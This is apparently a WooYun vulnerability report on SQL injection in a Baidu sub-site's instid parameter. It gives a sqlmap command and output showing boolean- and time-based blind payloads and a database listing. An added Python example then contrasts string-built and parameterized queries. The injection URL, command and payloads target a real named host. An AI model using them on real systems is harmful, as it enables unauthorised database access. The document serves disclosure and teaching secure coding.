
SQL injection on a Baidu sub-site

2014-12-24 15:20

http://guang.baidu.com/g/getinst?intPage=0&instid=5%27%20order%20by%201%20limit%200,1%23



The instid parameter is injectable; you have to be logged in to reach it.



Proof of vulnerability:

Code:
python sqlmap.py -u "http://guang.baidu.com/g/getinst?intPage=0&instid=5" -p instid --prefix "'" --suffix "limit 0,1#" --string "v2ex.com"  --dbms=mysql --cookie "cookie" --dbs



sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program



[*] starting at 22:06:06



[22:06:11] [INFO] testing connection to the target URL

[22:06:12] [INFO] testing if the provided string is within the target URL page content

[22:06:12] [WARNING] you provided 'v2ex.com' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: instid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: intPage=0&instid=5' AND 7341=7341 limit 0,1#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: intPage=0&instid=5' AND SLEEP(5) limit 0,1#

---





Code:
available databases [5]:

[*] Dr*****

[*] Dr*****

[*] Dr*****

[*] Dr*****

[*] information_schema







Fix:
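The report leaves the fix section empty, so here is an added illustration (not code from the page, the site, or the WooYun report) of the query shape the sqlmap prefix "'" and suffix "limit 0,1#" imply, next to the parameterized form that closes the hole. The backend language is not stated, so Python with an in-memory SQLite database stands in for the real MySQL endpoint; the table name, column names, and sample rows are assumptions constructed for this example, and MySQL's "#" comment terminator in the page's payload is swapped for SQLite's "-- " so the stand-in database parses it.

```python
import sqlite3

# Sample rows, constructed for this example (assumption: a table keyed by
# an integer instid, mirroring the vulnerable URL parameter).
SAMPLE_ROWS = [(5, "inst-five"), (6, "inst-six")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inst (instid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO inst VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def build_query_unsafe(instid):
    """Vulnerable pattern implied by the report: the request value is pasted
    into a quoted literal and the statement ends with "limit 0,1". That is
    the shape that lets sqlmap's prefix "'" and suffix "limit 0,1#" line up
    with the server's own SQL."""
    return f"SELECT instid, name FROM inst WHERE instid = '{instid}' limit 0,1"


def lookup_unsafe(conn, instid):
    return conn.execute(build_query_unsafe(instid)).fetchall()


def lookup_bound(conn, instid):
    """Fix, part 1: bind the value. Whatever the client sends is compared as
    one opaque value and can no longer alter the statement's structure."""
    return conn.execute(
        "SELECT instid, name FROM inst WHERE instid = ? LIMIT 1", (instid,)
    ).fetchall()


def lookup_safe(conn, instid):
    """Fix, part 2: also enforce the type the parameter is meant to have
    before it reaches the database, so malformed input is rejected outright."""
    if not isinstance(instid, str) or not instid.isdigit():
        raise ValueError("instid must be a non-negative integer")
    return lookup_bound(conn, int(instid))


# The boolean-based payload from the sqlmap output, with MySQL's "#" replaced
# by SQLite's "-- " for the stand-in database; the second differs only in the
# comparison, which is what "boolean-based blind" in the finding refers to.
TRUE_PAYLOAD = "5' AND 7341=7341 limit 0,1-- "
FALSE_PAYLOAD = "5' AND 7341=7342 limit 0,1-- "


def demo():
    """Run the same inputs through the vulnerable and the fixed lookups."""
    conn = make_db()
    results = {
        # Unsafe: the true condition returns the row, the false one does not,
        # which is the response difference the blind technique keys on.
        "unsafe_true": lookup_unsafe(conn, TRUE_PAYLOAD),
        "unsafe_false": lookup_unsafe(conn, FALSE_PAYLOAD),
        # Bound: the payload is just a string that matches no instid.
        "bound_payload": lookup_bound(conn, TRUE_PAYLOAD),
        # Safe: a normal id still works.
        "safe_normal": lookup_safe(conn, "5"),
    }
    try:
        lookup_safe(conn, TRUE_PAYLOAD)
        results["safe_payload"] = "accepted"
    except ValueError:
        results["safe_payload"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two halves of the fix are independent: binding alone already stops the injection (the bound lookup returns nothing for the payload), and the integer check in front of it keeps garbage out of the query log and gives the application a clean place to reject and alert on malformed ids.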

Source: www.wooyun.org/bugs/wooyun-2014-082625
